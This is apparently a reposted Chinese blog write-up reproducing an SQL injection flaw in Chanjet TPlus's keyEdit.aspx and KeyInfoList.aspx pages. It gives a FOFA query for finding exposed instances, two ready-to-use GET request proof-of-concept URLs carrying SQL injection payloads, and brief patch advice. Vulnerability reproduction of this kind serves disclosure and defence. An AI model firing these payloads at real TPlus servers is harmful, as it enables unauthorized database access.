当前位置: 首页 > news >正文

畅捷通TPlus keyEdit.aspx、KeyInfoList.aspx SQL注入漏洞复现

news 2025/8/5 0:09:44

前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、产品简介

畅捷通-TPlus是一个为中小企业设计的财税云服务平台,提供财务、税务管理和发票处理功能,支持低代码开发,帮助企业实现数字化和智能化经营管理。

二、漏洞描述

该系统的keyEdit.aspx、KeyInfoList.aspx接口存在sql注入漏洞

三、影响范围

未知

四、复现环境

FOFA:

app="畅捷通-TPlus"

五、漏洞复现

1.访问存在漏洞的网站
在这里插入图片描述

2.直接以GET方式请求

POC1:

http://127.0.0.1/tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','1')))--+

POC2

http://127.0.0.1/tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20sys.fn_varbintohexstr(hashbytes(%27MD5%27,%27123456%27)))%20--&preload=1

3.成功
在这里插入图片描述
在这里插入图片描述

六、修复建议

关闭互联网暴露面访问的权限,及时更新系统

参考链接

https://blog.csdn.net/ahhacker86/article/details/138482856
https://blog.csdn.net/wan___she__pi/article/details/137461590

http://www.lryc.cn/news/350631.html

相关文章:

  • Ubuntu22 下配置 Qt5 环境
  • 普通人也能创业!轻资产短视频带货项目,引领普通人实现创业梦想
  • 【Maven】Nexus简单使用
  • winform嵌入excel 设置父窗体分辨率不是100% 嵌入excel分辨率变成双倍大小
  • 前端系列-4 promise与async/await与fetch/axios使用方式
  • 微信公众号自定义分销商城小程序源码系统 带完整的安装代码吧以及系统部署搭建教程
  • 在另外一个页面,让另外一个页面弹框显示操作(调佣公共的弹框)vue
  • 羊毛-百度Comate领50京东E卡
  • kafka安装部署
  • VBA直连SAP RFC 接口实例
  • 2024如何挑选开放式蓝牙耳机?热门爆款熬夜整理六个点!
  • 3D数据格式转换工具HOOPS Exchange在PLM系统中的5大应用优势
  • 友元是一种允许某些外部函数或类访问另一个类的成员的机制
  • 儿童护眼台灯哪个牌子好,适合儿童使用的护眼台灯推荐
  • 在电脑本地运行llama3-8b模型
  • 深入理解 House of Cat
  • 【Linux玩物志】Linux环境开发基本工具使用(1)——vim
  • Lora训练Windows[笔记]
  • nuget局域网在线包制作,nuget打包,nuget打自己的包
  • Ubuntu 24 换国内源及原理 (阿里源)
  • python学习-使用pandas库分析excel表,并导出所需的表
  • Python中使用C扩展详解
  • llama使用tutorial微调(windows版本)
  • MyBatis操作数据库(动态SQL)
  • python发票真伪查验开发文档、票据OCR、数电票查验
  • Unity构建详解(12)——自动构建
  • 中文编程降低了中文环境下编程入门的门槛
  • 通过内网穿透免费部署我们的springboot+vue项目 实现跟服务器一样的效果
  • SMB攻击利用之-mimikatz上传/下载流量数据包逆向分析
  • Mysql常见数据类型探索